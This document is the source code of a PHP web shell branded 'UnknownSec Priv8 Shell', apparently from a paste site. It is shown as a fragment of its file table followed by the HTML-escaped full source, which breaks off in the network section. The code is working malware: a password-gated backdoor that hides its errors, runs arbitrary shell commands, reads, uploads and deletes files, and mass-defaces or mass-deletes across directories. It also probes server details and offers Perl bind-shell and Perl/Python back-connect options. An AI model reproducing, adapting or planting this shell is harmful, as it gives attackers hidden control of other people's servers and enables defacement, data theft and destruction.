<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename&opn=$file'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_file&opn=$file'><i class='bi bi-trash-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=download&opn=$file'><i class='bi bi-download'></i></a>

</div>

<div class='card card-body text-dark input-group mb-3'>

<p>Are you sure to delete : ".basename($file)." ?</p>

<form method='POST'>

<a class='btn btn-danger btn-block btn-sm' href='?dir=$dir'>No</a>

<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>

</form>

</div>";

}

//delete folder

if ($_7['action'] == 'delete_folder' ) {

s();

if ($_7['yeah']) {

if(is_dir($dir)) {

if(is_writable($dir)) {

@rmdir($dir);

@exe("rm -rf $dir");

@exe("rmdir /s /q $dir");

echo '<strong>Delete folder</strong> ok! '.ok().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>';

} else {

echo '<strong>Delete folder</strong> fail! '.er().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>';

}

}

}

echo "

<div class='btn-group mb-3'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_folder'><i class='bi bi-trash-fill'></i></a>

</div>

<div class='card card-body text-dark input-group mb-3'>

<p>Are you sure to delete : ".basename($dir)." ?</p>

<form method='POST'>

<a class='btn btn-danger btn-block btn-sm' href='?dir=".dirname($dir)."'>No</a>

<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>

</form>

</div>";

}

if(isset($_7['filenew'])) {

s();

if(isset($_7['bikin'])){

$name = $_7['name_file'];

$contents_file = $_7['contents_file'];

foreach ($name as $name_file){

$handle = @fopen("$name_file", "w");

if($contents_file){

$create = @fwrite($handle, $contents_file);

} else {

$create = $handle;

}

}

if($create){

echo "<script>window.location='?path=$path'</script>";

} else {

echo '<strong>Create file</strong> fail! '.er().'</div>';

}

}

echo "

<div class='mb-3'>

<form method='POST'>

<i class='bi bi-file-earmark'></i> Filename:

<input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' $_r>

<i class='bi bi-file-earmark'></i> Your script:

<textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' $_r></textarea>

<div class='d-grid gap-2'>

<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>

</div>

</form>

</div>";

}

if(isset($_7['dirnew'])) {

s();

if(isset($_7['create'])){

$name = $_7['name_dir'];

foreach ($name as $name_dir){

$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $name_dir);

$fd = @mkdir ($folder);

}

if($fd){

echo "<script>window.location='?path=$path'</script>";

} else {

echo '<strong>Create dir</strong> fail! '.er().'</div>';

}

}

echo "

<div class='mb-3'>

<form method='POST'>

<i class='bi bi-folder'></i> Name directory:

<div class='input-group mb-3'>

<input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' $_r>

<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'>

</div>

</form>

</div>";

}

echo '

<div class="table-responsive">

<table class="table table-hover table-dark text-light">

<thead>

<tr>

<td class="text-center">name</td>

<td class="text-center">type</td>

<td class="text-center">last edit</td>

<td class="text-center">size</td>

<td class="text-center">owner<gr>/</gr>group</td>

<td class="text-center">permsion</td>

<td class="text-center">action</td>

</tr>

</thead>

<tbody class="text-nowrap">

<tr>

<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path='.dirname($dir).'">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">

<div class="btn-group">

<a class="btn btn-outline-light btn-sm" href="?filenew&path='.$dir.'"><i class="bi bi-file-earmark-plus-fill"></i></a>

<a class="btn btn-outline-light btn-sm" href="?dirnew&path='.$dir.'"><i class="bi bi-folder-plus"></i></a>

</div>

</td>

</tr>';

foreach($scand as $dir){

$dt = date("Y-m-d G:i", filemtime("$path/$dir"));

if(strlen($dir) > 25) {

$_d = substr($dir, 0, 25)."...";

}else{

$_d = $dir;

}

if(function_exists('posix_getpwuid')) {

$downer = @posix_getpwuid(fileowner("$path/$dir"));

$downer = $downer['name'];

} else {

$downer = fileowner("$path/$dir");

}

if(function_exists('posix_getgrgid')) {

$dgrp = @posix_getgrgid(filegroup("$path/$dir"));

$dgrp = $dgrp['name'];

} else {

$dgrp = filegroup("$path/$dir");

}

if(!is_dir($path.'/'.$file)) continue;

$size = filesize($path.'/'.$file)/1024;

$size = round($size,3);

if($size >= 1024){

$size = round($size/1024,2).' MB';

}else{

$size = $size.' KB';

}

if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;

echo "

<tr>

<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$path/$dir'>$_d</a></td>

<td class='text-center'>dir</td>

<td class='text-center'>$dt</td>

<td class='text-center'>-</td>

<td class='text-center'>$downer<gr>/</gr>$dgrp</td>

<td class='text-center'>";

if(is_writable($path.'/'.$dir)) echo '<gr>';

elseif(!is_readable($path.'/'.$dir)) echo '<rd>';

echo p($path.'/'.$dir);

if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>';

echo "

<td class='text-center'>

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path/$dir&action=rename_folder'><i class='bi bi-pencil-fill'></i></a><a class='btn btn-outline-light btn-sm' href='?dir=$path/$dir&action=delete_folder'><i class='bi bi-trash-fill'></i></a>

</div>

</td>

</tr>";

}

foreach($scand as $file){

$ft = date("Y-m-d G:i", filemtime("$path/$file"));

if(function_exists('posix_getpwuid')) {

$fowner = @posix_getpwuid(fileowner("$path/$file"));

$fowner = $fowner['name'];

} else {

$fowner = fileowner("$path/$file");

}

if(function_exists('posix_getgrgid')) {

$fgrp = @posix_getgrgid(filegroup("$path/$file"));

$fgrp = $fgrp['name'];

} else {

$fgrp = filegroup("$path/$file");

}

if(!is_file($path.'/'.$file)) continue;

if(strlen($file) > 25) {

$_f = substr($file, 0, 25)."...-.".$ext;

}else{

$_f = $file;

}

echo "

<tr>

<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$path&action=view&opn=$file'>$_f</a></td>

<td class='text-center'>file</td>

<td class='text-center'>$ft</td>

<td class='text-center'>".sz(filesize($file))."</td>

<td class='text-center'>$fowner<gr>/</gr>$fgrp</td>

<td class='text-center'>";

if(is_writable($path.'/'.$file)) echo '<gr>';

elseif(!is_readable($path.'/'.$file)) echo '<rd>';

echo p($path.'/'.$file);

if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</gr></rd></td>';

echo "

<td class='text-center'>

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=view&opn=$path/$file'><i class='bi bi-eye-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=edit&opn=$path/$file'><i class='bi bi-pencil-square'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename&opn=$path/$file'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_file&opn=$path/$file'><i class='bi bi-trash-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=download&opn=$path/$file'><i class='bi bi-download'></i></a>

</div>

</td>

</tr>";

}

?>

</tbody>

</table>

</div><div class='text-secondary'>© 2020-<?=date('Y');?> UnknownSec</div>

</div>

</div>

</body>

</html>

Author

Title

Language

Your paste - Paste your paste here

&lt;?php
/* thanks to anon7 and all mem anonsec */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
session_start();
date_default_timezone_set(&quot;Asia/Jakarta&quot;);
$_7 = array_merge($_POST, $_GET);
$_r = &quot;required='required'&quot;;
$gcw = &quot;getcwd&quot;;
$inipass = &quot;QCMkeDFuNG0xQCMk&quot;;
if(isset($_7['x1nam1'])){
	echo &quot;&lt;div class='text-center text-muted'&gt;@#$x1n4m1@#$&lt;/div&gt;&quot;;
}
function Login() {
?&gt;
&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
	&lt;head&gt;
		&lt;meta charset=&quot;UTF-8&quot;&gt;
		&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=0.70&quot;&gt;
		&lt;title&gt;{ login }&lt;/title&gt;
		&lt;link rel=&quot;stylesheet&quot; href=&quot;//xnxx.co.ws/meki.css&quot;&gt;
		&lt;link rel=&quot;icon&quot; href=&quot;//xnxx.co.ws/anya.jpg&quot;&gt;
	&lt;/head&gt;
&lt;body class=&quot;bg-dark&quot;&gt;
&lt;form method=&quot;POST&quot;&gt;
	&lt;div class='container-fluid'&gt;
		&lt;div class='py-3' id='main'&gt;
			&lt;div class=&quot;input-group&quot;&gt;
				&lt;div class=&quot;input-group-text&quot;&gt;&lt;i class=&quot;bi bi-person-circle&quot;&gt;&lt;/i&gt;&lt;/div&gt;
				&lt;input class=&quot;form-control form-control-sm&quot; type=&quot;password&quot; placeholder=&quot;password&quot; name=&quot;p&quot; $_r&gt;
				&lt;button class=&quot;btn btn-outline-light btn-sm&quot;&gt;&lt;i class=&quot;bi bi-arrow-return-right&quot;&gt;&lt;/i&gt;&lt;/button&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;?php
exit;
}
if(!isset($_SESSION[base64_encode($_SERVER['HTTP_HOST'])]))
	if(empty($inipass) || (isset($_7['p']) &amp;&amp; (base64_encode($_7['p']) == $inipass) ) )
		$_SESSION[base64_encode($_SERVER['HTTP_HOST'])] = true;
	else
		Login();
// logout
if(isset($_7[&quot;left&quot;])) {
	session_start();
	session_destroy();
	echo '&lt;script&gt;window.location=&quot;'.$_SERVER['PHP_SELF'].'&quot;;&lt;/script&gt;';
}
// download file
if(isset($_7['opn']) &amp;&amp; ($_7['opn'] != '') &amp;&amp; ($_7['action'] == 'download')){
	@ob_clean();
	$file = $_7['opn'];
	header('Content-Description: File Transfer');
	header('Content-Type: application/octet-stream');
	header('Content-Disposition: attachment; filename=&quot;'.basename($file).'&quot;');
	header('Expires: 0');
	header('Cache-Control: must-revalidate');
	header('Pragma: public');
	header('Content-Length: ' . filesize($file));
	readfile($file);
	exit;
}
function w($dir,$perm) {
	if(!is_writable($dir)) {
		return &quot;&lt;rd&gt;&quot;.$perm.&quot;&lt;/rd&gt;&quot;;
	} else {
		return &quot;&lt;gr&gt;&quot;.$perm.&quot;&lt;/gr&gt;&quot;;
	}
}
function s(){
	echo '&lt;style&gt;table{display:none;}&lt;/style&gt;&lt;div class=&quot;table-responsive&quot;&gt;&lt;hr&gt;&lt;/div&gt;';
}
function ok(){
	echo '&lt;div class=&quot;alert alert-success alert-dismissible fade show my-3&quot; role=&quot;alert&quot;&gt;&lt;button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;alert&quot; aria-label=&quot;Close&quot;&gt;&lt;/button&gt;';
}
function er(){
	echo '&lt;div class=&quot;alert alert-danger alert-dismissible fade show my-3&quot; role=&quot;alert&quot;&gt;&lt;button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;alert&quot; aria-label=&quot;Close&quot;&gt;&lt;/button&gt;';
}
function sz($byt){
	$typ = array('B', 'KB', 'MB', 'GB', 'TB');
	for($i = 0; $byt &gt;= 1024 &amp;&amp; $i &lt; (count($typ) -1 ); $byt /= 1024, $i++ );
	return(round($byt,2).&quot; &quot;.$typ[$i]);
}
function ia() {
	$ia = '';
if (getenv('HTTP_CLIENT_IP'))
	$ia = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
	$ia = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
	$ia = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
	$ia = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
	$ia = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
	$ia = getenv('REMOTE_ADDR');
else
	$ia = 'Unknown IP.';
return $ia;
}
function exe($cmd) {
if(function_exists('system')) {
	@ob_start();
	@system($cmd);
	$buff = @ob_get_contents();
	@ob_end_clean();
	return $buff;
} elseif(function_exists('exec')) {
	@exec($cmd,$results);
	$buff = &quot;&quot;;
foreach($results as $result) {
	$buff .= $result;
	} return $buff;
} elseif(function_exists('passthru')) {
	@ob_start();
	@passthru($cmd);
	$buff = @ob_get_contents();
	@ob_end_clean();
	return $buff;
} elseif(function_exists('shell_exec')) {
	$buff = @shell_exec($cmd);
	return $buff;
	}
}
function exe_root($set,$sad) {
	$x = &quot;preg_match&quot;;
	$xx = &quot;2&gt;&amp;1&quot;;
	if (!$x(&quot;/&quot;.$xx.&quot;/i&quot;, $set)) {
		$set = $set.&quot; &quot;.$xx;
	}
	$a = &quot;function_exists&quot;;
	$b = &quot;proc_open&quot;;
	$c = &quot;htmlspecialchars&quot;;
	$d = &quot;stream_get_contents&quot;;
	if ($a($b)) {
		$ps = $b($set, array(0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;), 1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;), 2 =&gt; array(&quot;pipe&quot;, &quot;r&quot;)), $pink,$sad);
		return $d($pink[1]);
	} else {
		return &quot;proc_open function is disabled !&quot;;
	}
}
function p($file){
$p = fileperms($file);
if (($p &amp; 0xC000) == 0xC000) {
$i = 's';
} elseif (($p &amp; 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p &amp; 0x8000) == 0x8000) {
$i = '-';
} elseif (($p &amp; 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p &amp; 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p &amp; 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p &amp; 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
	}
$i .= (($p &amp; 0x0100) ? 'r' : '-');
$i .= (($p &amp; 0x0080) ? 'w' : '-');
$i .= (($p &amp; 0x0040) ?
(($p &amp; 0x0800) ? 's' : 'x' ) :
(($p &amp; 0x0800) ? 'S' : '-'));
$i .= (($p &amp; 0x0020) ? 'r' : '-');
$i .= (($p &amp; 0x0010) ? 'w' : '-');
$i .= (($p &amp; 0x0008) ?
(($p &amp; 0x0400) ? 's' : 'x' ) :
(($p &amp; 0x0400) ? 'S' : '-'));
$i .= (($p &amp; 0x0004) ? 'r' : '-');
$i .= (($p &amp; 0x0002) ? 'w' : '-');
$i .= (($p &amp; 0x0001) ?
(($p &amp; 0x0200) ? 't' : 'x' ) :
(($p &amp; 0x0200) ? 'T' : '-'));
return $i;
}
if(isset($_7['dir'])) {
	$dir = $_7['dir'];
	chdir($dir);
} else {
	$dir = $gcw();
}
echo &quot;
&lt;html&gt;
	&lt;head&gt;
		&lt;meta charset='UTF-8'&gt;
		&lt;meta name='author' content='UnknownSec'&gt;
		&lt;meta name='viewport' content='width=device-width, initial-scale=0.70'&gt;
		&lt;link rel='stylesheet' href='//xnxx.co.ws/meki.css'&gt;
		&lt;link rel='icon' href='//xnxx.co.ws/anya.jpg'&gt;
		&lt;title&gt;{ File Manager }&lt;/title&gt;
		&lt;script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'&gt;&lt;/script&gt;
		&lt;script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'&gt;&lt;/script&gt;
		&lt;script src='//code.jquery.com/jquery-3.3.1.slim.min.js'&gt;&lt;/script&gt;
	&lt;/head&gt;
&lt;body class='bg-secondary text-light'&gt;
&lt;div class='container-fluid'&gt;
	&lt;div class='py-3' id='main'&gt;
		&lt;div class='box shadow bg-dark p-4 rounded-3'&gt;
			&lt;a class='text-decoration-none text-light anu' href='&quot;.$_SERVER['PHP_SELF'].&quot;'&gt;&lt;h4&gt;UnknownSec Priv8 Shell&lt;/h4&gt;&lt;/a&gt;&quot;;
			if(isset($_7['path'])){
				$path = $_7['path'];
				chdir($path);
			}else{
				$path = $gcw();
			}
				$path = str_replace('\\','/',$path);
				$paths = explode('/',$path);
			foreach($paths as $id=&gt;$pat){
			if($pat == '' &amp;&amp; $id == 0){
				$a = true;
					echo &quot;&lt;i class='bi bi-hdd-rack'&gt;&lt;/i&gt;:&lt;a class='text-decoration-none text-light' href='?path=/'&gt;/&lt;/a&gt;&quot;;
				continue;
			}
			if($pat == '') continue;
				echo &quot;&lt;a class='text-decoration-none' href='?path=&quot;;
				for($i=0;$i&lt;=$id;$i++){
				echo &quot;$paths[$i]&quot;;
			if($i != $id) echo &quot;/&quot;;
			}
			echo &quot;'&gt;&quot;.$pat.&quot;&lt;/a&gt;/&quot;;
			}
			$scand = scandir($path);
			echo &quot;&amp;nbsp;[ &quot;.w($path, p($path)).&quot; ]&quot;;
			// info
			$sql = (function_exists('mysql_connect')) ? &quot;&lt;gr&gt;ON&lt;/gr&gt;&quot; : &quot;&lt;rd&gt;OFF&lt;/rd&gt;&quot;;
			$curl = (function_exists('curl_version')) ? &quot;&lt;gr&gt;ON&lt;/gr&gt;&quot; : &quot;&lt;rd&gt;OFF&lt;/rd&gt;&quot;;
			$wget = (exe('wget --help')) ? &quot;&lt;gr&gt;ON&lt;/gr&gt;&quot; : &quot;&lt;rd&gt;OFF&lt;/rd&gt;&quot;;
			$pl = (exe('perl --help')) ? &quot;&lt;gr&gt;ON&lt;/gr&gt;&quot; : &quot;&lt;rd&gt;OFF&lt;/rd&gt;&quot;;
			$py = (exe('python --help')) ? &quot;&lt;gr&gt;ON&lt;/gr&gt;&quot; : &quot;&lt;rd&gt;OFF&lt;/rd&gt;&quot;;
			$disfunc = @ini_get(&quot;disable_functions&quot;);
			$kernel = php_uname();
			$phpver = PHP_VERSION;
			$phpos = PHP_OS;
			$soft = $_SERVER[&quot;SERVER_SOFTWARE&quot;];
			$ip = gethostbyname($_SERVER['HTTP_HOST']);
			if (empty($disfunc)) {
				$disfc = &quot;&lt;gr&gt;NONE&lt;/gr&gt;&quot;;
			} else {
				$disfc = &quot;&lt;rd&gt;$disfunc&lt;/rd&gt;&quot;;
			}
			if(!function_exists('posix_getegid')) {
				$user = @get_current_user();
				$uid = @getmyuid();
				$gid = @getmygid();
				$group = &quot;?&quot;;
			} else {
				$uid = @posix_getpwuid(posix_geteuid());
				$gid = @posix_getgrgid(posix_getegid());
				$user = $uid['name'];
				$uid = $uid['uid'];
				$group = $gid['name'];
				$gid = $gid['gid'];
			}
			$sm = (@ini_get(strtolower(&quot;safe_mode&quot;)) == 'on') ? &quot;&lt;rd&gt;ON&lt;/rd&gt;&quot; : &quot;&lt;gr&gt;OFF&lt;/gr&gt;&quot;;
		echo &quot;
		&lt;div class='container-fluid'&gt;
			&lt;div class='corner anu py-3'&gt;
				&lt;button class='btn btn-outline-light btn-sm' data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'&gt;&lt;i class='bi bi-info-circle'&gt;&lt;/i&gt; info &lt;i class='bi bi-chevron-down'&gt;&lt;/i&gt;&lt;/button&gt;
			&lt;/div&gt;
			&lt;div class='collapse text-dark mb-3' id='collapseExample'&gt;
				&lt;div class='box shadow bg-light p-3 rounded-3'&gt;
				System: &lt;gr&gt;$kernel&lt;/gr&gt;&lt;br&gt;
				Software: &lt;gr&gt;$soft&lt;/gr&gt;&lt;br&gt;
				PHP version: &lt;gr&gt;$phpver&lt;/gr&gt; &lt;a class='text-decoration-none' href='?dir=$path&amp;id=phpinfo'&gt;[ PHPINFO ]&lt;/a&gt; PHP os: &lt;gr&gt;$phpos&lt;/gr&gt;&lt;br&gt;
				Server Ip: &lt;gr&gt;$ip&lt;/gr&gt;&lt;br&gt;
				Your Ip: &lt;gr&gt;&quot;.ia().&quot;&lt;/gr&gt;&lt;br&gt;
				User: &lt;gr&gt;$user&lt;/gr&gt; ($uid) | Group: &lt;gr&gt;$group&lt;/gr&gt; ($gid)&lt;br&gt;
				Safe Mode: $sm&lt;br&gt;
				MySQL: $sql | Perl: $pl | Python: $py | WGET: $wget | CURL: $curl&lt;br&gt;
				Disable Function:&lt;br&gt;&lt;pre&gt;$disfc&lt;/pre&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
		&lt;div class='text-center'&gt;
			&lt;div class='btn-group'&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=upload'&gt;&lt;i class='bi bi-upload'&gt;&lt;/i&gt; Upload&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=deface'&gt;&lt;i class='bi bi-exclamation-diamond'&gt;&lt;/i&gt; Mass deface&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=delete'&gt;&lt;i class='bi bi-trash'&gt;&lt;/i&gt; Mass delete&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=cmd'&gt;&lt;i class='bi bi-terminal'&gt;&lt;/i&gt; Console&lt;/a&gt;
			&lt;/div&gt;
			&lt;div class='btn-group'&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=scan_root'&gt;&lt;i class='bi bi-search'&gt;&lt;/i&gt; Scan root&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;id=network'&gt;&lt;i class='bi bi-hdd-network'&gt;&lt;/i&gt; Network&lt;/a&gt;
				&lt;a class='btn btn-outline-light btn-sm' href='?left'&gt;&lt;i class='bi bi-box-arrow-in-left'&gt;&lt;/i&gt; Logout&lt;/a&gt;
			&lt;/div&gt;
		&lt;/div&gt;&quot;;
		// tools
		if(isset($_7['dir'])) {
			$dir = $_7['dir'];
			chdir($dir);
		} else {
			$dir = $gcw();
		}
		$dir = str_replace(&quot;\\&quot;,&quot;/&quot;,$dir);
		$scdir = explode(&quot;/&quot;, $dir);	
		for($i = 0; $i &lt;= $c_dir; $i++) {
			$scdir[$i];
			if($i != $c_dir) {
		}
		// mass deface
		if($_7['id'] == 'deface'){
		function mass_all($dir,$namefile,$contents_sc) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = &quot;$dir/$dirb&quot;;
				$▚ = $dirc.'/'.$namefile;
				if($dirb === '.') {
					file_put_contents($▚, $contents_sc);
				} elseif($dirb === '..') {
					file_put_contents($▚, $contents_sc);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo &quot;[&lt;gr&gt;&lt;i class='bi bi-check-all'&gt;&lt;/i&gt;&lt;/gr&gt;]&amp;nbsp;$▚&lt;br&gt;&quot;;
							file_put_contents($▚, $contents_sc);
							$▟ = mass_all($dirc,$namefile,$contents_sc);
							}
						}
					}
				}
			}
		}
		function mass_onedir($dir,$namefile,$contents_sc) {
			if(is_writable($dir)) {
				$dira = scandir($dir);
				foreach($dira as $dirb) {
					$dirc = &quot;$dir/$dirb&quot;;
					$▚ = $dirc.'/'.$namefile;
					if($dirb === '.') {
						file_put_contents($▚, $contents_sc);
					} elseif($dirb === '..') {
						file_put_contents($▚, $contents_sc);
					} else {
						if(is_dir($dirc)) {
							if(is_writable($dirc)) {
								echo &quot;[&lt;gr&gt;&lt;i class='bi bi-check-all'&gt;&lt;/i&gt;&lt;/gr&gt;]&amp;nbsp;$dirb/$namefile&lt;br&gt;&quot;;
								file_put_contents($▚, $contents_sc);
							}
						}
					}
				}
			}
		}
		if($_7['start']) {
			if($_7['tipe'] == 'mass') {
			mass_all($_7['d_dir'], $_7['d_file'], $_7['script']);
			} elseif($_7['tipe'] == 'onedir') {
			mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']);
			}
		}
		s();
		echo &quot;
		&lt;div class='card card-body text-dark input-group mb-3'&gt;
			&lt;form method='POST'&gt; Tipe:
			&lt;div class='form-check'&gt;
				&lt;input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked&gt;
				&lt;label class='form-check-label' for='flexCheckDefault'&gt;One dir&lt;/label&gt;
			&lt;/div&gt;
			&lt;div class='form-check'&gt;
				&lt;input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'&gt;
				&lt;label class='form-check-label' for='flexCheckDefault'&gt;All directory&lt;/label&gt;
			&lt;/div&gt;
				&lt;i class='bi bi-folder'&gt;&lt;/i&gt; Directory:
				&lt;input class='form-control btn-sm' type='text' name='d_dir' value='$dir' $_r&gt;
				&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt; Filename:
				&lt;input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' $_r&gt;
				&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt; Your script:
				&lt;textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script' $_r&gt;&lt;/textarea&gt;
				&lt;div class='d-grid gap-2'&gt;
					&lt;input class='btn btn-dark btn-sm' type='submit' name='start' value='deface'&gt;
				&lt;/div&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		// mass delete
		if($_7['id'] == 'delete'){
		function mass_delete($dir,$namefile) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = &quot;$dir/$dirb&quot;;
				$▚ = $dirc.'/'.$namefile;
				if($dirb === '.') {
					if(file_exists(&quot;$dir/$namefile&quot;)) {
						unlink(&quot;$dir/$namefile&quot;);
					}
				} elseif($dirb === '..') {
					if(file_exists(&quot;&quot;.dirname($dir).&quot;/$namefile&quot;)) {
						unlink(&quot;&quot;.dirname($dir).&quot;/$namefile&quot;);
					}
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							if(file_exists($▚)) {
								echo &quot;[&lt;gr&gt;&lt;i class='bi bi-check-all'&gt;&lt;/i&gt;&lt;/gr&gt;]&amp;nbsp;$▚&lt;br&gt;&quot;;
								unlink($▚);
								$▟ = mass_delete($dirc,$namefile);
								}
							}
						}
					}
				}
			}
		}
		if($_7['start']) {
			mass_delete($_7['d_dir'], $_7['d_file']);
		}
		s();
		echo &quot;
		&lt;div class='card card-body text-dark input-group mb-3'&gt;
			&lt;form method='POST'&gt;
				&lt;i class='bi bi-folder'&gt;&lt;/i&gt; Directory:
				&lt;input class='form-control btn-sm' type='text' name='d_dir' value='$dir' $_r&gt;
					&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt; Filename:
				&lt;div class='input-group'&gt;
					&lt;input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' $_r&gt;&lt;br&gt;
					&lt;div class='input-group-append'&gt;
						&lt;input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		// phpinfo 
		if($_7['id'] == 'phpinfo'){
			@ob_start();
			@eval(&quot;phpinfo();&quot;);
			$buff = @ob_get_contents();
			@ob_end_clean();	
			$front = strpos($buff,&quot;&lt;body&gt;&quot;)+6;
			$end = strpos($buff,&quot;&lt;/body&gt;&quot;);
			echo &quot;&lt;pre class='php_info'&gt;&quot;.substr($buff,$front,$front-$front).&quot;&lt;/pre&gt;&quot;;
			exit;
		}
		// network
		if($_7['id'] == 'network'){
		s();
		echo &quot;
		&lt;div class='card text-dark'&gt;
			&lt;div class='card-header'&gt;
				&lt;form method='post'&gt;
					&lt;u&gt;Bind port to /bin/sh [Perl]&lt;/u&gt;&lt;br&gt;
					&lt;u&gt;Port :&lt;/u&gt;
				&lt;div class='input-group'&gt;
					&lt;input class='form-control btn-sm' type='text' name='port' placeholder='6969'&gt;
					&lt;input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'&gt;
				&lt;/div&gt;
			&lt;h5&gt;Back-Connect&lt;/h5&gt;
			&lt;u&gt;Server :&lt;/u&gt;
				&lt;input class='form-control btn-sm' type='text' name='server' placeholder='&quot;. $_SERVER['REMOTE_ADDR'] .&quot;'&gt;
			&lt;u&gt;Port :&lt;/u&gt;
			&lt;div class='input-group'&gt;
				&lt;input class='form-control btn-sm' type='text' name='port' placeholder='6969'&gt;
				&lt;select class='form-control btn-sm' name='bc'&gt;
					&lt;option value='perl'&gt;perl&lt;/option&gt;
					&lt;option value='python'&gt;python&lt;/option&gt;
				&lt;/select&gt;
			&lt;/div&gt;
			&lt;div class='d-grid gap-2'&gt;
				&lt;input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'&gt;
			&lt;/div&gt;
		&lt;/form&gt;&quot;;
		if($_7['bpl']){
